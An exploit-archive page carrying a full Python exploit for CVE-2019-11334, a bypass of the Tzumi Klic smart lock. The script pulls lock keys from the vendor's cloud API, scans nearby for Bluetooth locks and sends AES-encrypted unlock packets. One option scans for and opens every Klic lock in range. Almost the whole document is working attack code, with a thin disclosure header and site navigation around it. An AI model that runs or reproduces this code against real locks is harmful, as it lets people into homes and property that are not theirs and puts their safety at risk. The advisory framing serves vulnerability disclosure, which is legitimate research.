exploit the possibilities

Tzumi Electronics Klic Lock Authentication Bypass

Tzumi Electronics Klic Lock Authentication Bypass
Posted Jun 14, 2019
Authored by Kerry Enfinger

Tzumi Electronics Klic Lock version 1.0.9 allows for attackers to access resources via capture-replay.

tags | exploit
advisories | CVE-2019-11334
MD5 | 90a59931dc009b7842e44be11b45bf5e

Tzumi Electronics Klic Lock Authentication Bypass

Change Mirror Download
# CVE-2019-11334
# MIT License
# Copyright (c) 2019 Kerry Enfinger
# Python program to unlock any Tzumi Klic smart locks Model 5686 Firmware 6.2
# May work on other smart locks
# Requires valid account email and password from Klic mobile application

import argparse
import requests
import json
from subprocess import call
from bluepy.btle import Scanner
from bluepy.btle import Peripheral
from bluepy.btle import DefaultDelegate
from bluepy.btle import UUID
from Crypto.Cipher import AES

NOTIFICATION = ""

class KlicDelegate(DefaultDelegate):

def __init__(self, key):
DefaultDelegate.__init__(self)
self.aes_key = key

def decrypt(self, payload):
aes = AES.new(self.aes_key, AES.MODE_ECB)
decrypted = aes.decrypt(payload)
return decrypted.encode('hex')

def handleNotification(self, handle, data):
global NOTIFICATION
NOTIFICATION = self.decrypt(data)

class Klic:

def __init__(self):
self.lockKey=""
self.mac = ""
self.lockPwd = "000000"
self.aes_key = ""
self.token = ""
self.userId = ""
self.url = "http://app.nokelock.com:8080/"
self.ext_get_token = "/newNokelock/user/loginByPassword"
self.ext_get_lock_list = "/newNokelock/lock/getLockList"
self.ext_query_device = "/newNokelock/lock/queryDevice"
self.headers = {'token': 'None', 'clientType': 'Android', 'language': 'en-US', 'phoneModel': 'Nexus 5', 'osVersion': '7.1.2', 'appVersion': '1.0.9', 'Content-Type': 'application/json;charset=UTF-8', 'User-Agent': 'okhttp/3.11.0'}


def set_aes_key(self, lockKey):
hexkey = [lockKey[i:i+2] for i in range(0, len(lockKey), 2)]
hexkey = [int(i) for i in hexkey]
hexkey = ["{:02x}".format(x) for x in hexkey]
hexkey = ''.join(hexkey)
self.aes_key = str(bytearray.fromhex(hexkey))

def parse_lock_key(self, lock_key):
temp_key = lock_key.encode("utf-8")
temp_key = [x.strip() for x in temp_key.split(',')]
new_key = ""
for i in temp_key:
new_key = new_key + i.zfill(2)
return new_key

def get_token(self, account_str, password_str):
data = {'account': account_str, 'code': password_str, 'type': '0'}
response = requests.post(self.url + self.ext_get_token, data=json.dumps(data), headers=self.headers)
json_resp = response.json()
result = json_resp['result']
return result['token'], result['userId']

def get_lock_keys(self, account_str, password_str):
self.token, self.userId = self.get_token(account_str, password_str)
data = {'userId': self.userId}
self.headers['token'] = self.token
response = requests.post(self.url + self.ext_get_lock_list, data=json.dumps(data), headers=self.headers)
json_resp = response.json()
result = json_resp['result']
lock_key = result[0]['lockKey']
self.lockKey = self.parse_lock_key(lock_key)
self.lockPwd = result[0]['lockPwd']
self.mac = result[0]['mac']

def get_lock_keys_by_mac(self, account_str, password_str, mac_addr):
self.token, self.userId = self.get_token(account_str, password_str)
data = {'mac': mac_addr}
self.headers['token'] = self.token
response = requests.post(self.url + self.ext_query_device, data=json.dumps(data), headers=self.headers)
json_resp = response.json()
result = json_resp['result']
lock_key = result['lockKey']
self.lockKey = self.parse_lock_key(lock_key)
self.lockPwd = result['lockPwd']
self.mac = result['mac']
print(self.lockKey)
print(self.lockPwd)
print(self.mac)

def scan(self, timeout=5):
scanner = Scanner()
sec = timeout
dev_list = []
print("Scanning for %s seconds" % sec)
devs = scanner.scan(sec)
for dev in devs:
localname = dev.getValueText(9)
if localname and localname.startswith("BS01"):
print("Device found:")
dev_list.append(dev.addr)
print(" %s (%s), rssi=%d" % (dev.addr, localname, dev.rssi))
return dev_list

def encrypt(self, payload):
while len(payload) < 16:
payload += "\x00"
aes = AES.new(self.aes_key, AES.MODE_ECB)
return aes.encrypt(payload)

def unlock_with_key(self, lock_key, mac_addr):
self.lockKey = lock_key
self.mac = mac_addr
self.unlockKlic()

def unlock_with_account(self, account, password):
self.get_lock_keys(account, password)
self.unlockKlic()

def unlock_with_mac(self, account, password, mac):
self.get_lock_keys_by_mac(account, password, mac)
self.unlockKlic()

def unlockKlic(self):
print("lockKey: " + self.lockKey)
print("lockPwd: " + self.lockPwd)
print("mac: " + self.mac)
print("")

# Convert lockKey to hex
self.set_aes_key(self.lockKey)

# Connect to klic lock
klic = Peripheral(self.mac, "public")
klic.setDelegate(KlicDelegate(self.aes_key))

# Setup to turn notifications on
setup_data = b"\x01\x00"
notify = klic.getCharacteristics( uuid='000036f5-0000-1000-8000-00805f9b34fb' )[0]
notify_handle = notify.getHandle() + 1
klic.writeCharacteristic(notify_handle, setup_data, withResponse=True)

# Send get token packet
c = klic.getCharacteristics( uuid='000036f5-0000-1000-8000-00805f9b34fb' )[0]
payload = self.encrypt("\x06\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
c.write(payload)
print("Sent get token packet!")
# Waiting for notification
while True:
if klic.waitForNotifications(1.0):
# handleNotification() was called
print("Got Notification: " + NOTIFICATION)
hexkey = [NOTIFICATION[i:i+2] for i in range(0, len(NOTIFICATION), 2)]
if hexkey[0] == '06' and hexkey[1] == '02':
break
continue
print("")

# Send get battery packet
c = klic.getCharacteristics( uuid='000036f5-0000-1000-8000-00805f9b34fb' )[0]
payload = self.encrypt("\x02\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
c.write(payload)
print("Sent get battery packet!")
# Waiting for notification
while True:
if klic.waitForNotifications(1.0):
# handleNotification() was called
print("Got Notification: " + NOTIFICATION)
hexkey = [NOTIFICATION[i:i+2] for i in range(0, len(NOTIFICATION), 2)]
if hexkey[0] == '02' and hexkey[1] == '02':
break
continue
print("")

# Send open lock packet
c = klic.getCharacteristics( uuid='000036f5-0000-1000-8000-00805f9b34fb' )[0]
payload = self.encrypt("\x05\x01\x06\x30\x30\x30\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00")
c.write(payload)
print("Sent open lock packet!")
while True:
if klic.waitForNotifications(1.0):
# handleNotification() was called
print("Got Notification: " + NOTIFICATION + "\n")
break
print("Lock should be unlocked!\n\n")

if __name__ == "__main__":
print('[*] KlicUnlock v1.0.0')
print('[*] Author: Kerry Enfinger\n')
print('[*] CVE-2019-11334\n')

parser = argparse.ArgumentParser(description='Klic Lock unlocking program.')
parser.add_argument('-a', '--account', help='email address used when signing into app', type=str)
parser.add_argument('-p', '--password', help='password used when signing into app', type=str)
parser.add_argument('-k', '--key', help='key for lock (if known)', type=str)
parser.add_argument('-m', '--mac', help='mac address for lock (if known)', type=str)
parser.add_argument('-s', '--scan', help='scan for all nearby Klic locks', action='store_true')
parser.add_argument('-u', '--unlock_all', help='scan for and unlock all nearby Klic locks', action='store_true')
args = parser.parse_args()

# Bring up bluetooth adapter and service - hci# may need to be changed for your individual needs
call(["hciconfig", "hci0", "up"])
call(["service", "bluetooth", "start"])

if args.account and args.password and args.unlock_all is False:
k = Klic()
k.unlock_with_account(args.account, args.password)
elif args.account and args.password and args.unlock_all is True:
k = Klic()
lock_list = k.scan()
for lock in lock_list:
print(args.account)
print(args.password)
print(lock.upper())
k.unlock_with_mac(args.account, args.password, lock.upper())
elif args.key and args.mac:
k = Klic()
k.unlock_with_key(args.key, args.mac)
elif args.scan:
k = Klic()
k.scan()
else:
print('You need to input account/password or key/mac combination')
print('[*] Examples:')
print('[*] python KlicUnlock.py -a myaccount@example.com -p mypassword')
print('[*] python KlicUnlock.py -a myaccount@example.com -p mypassword -u')
print('[*] python KlicUnlock.py -k 99999999999999999999999999999999 -m 01:02:03:04:05:06')


Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    15 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close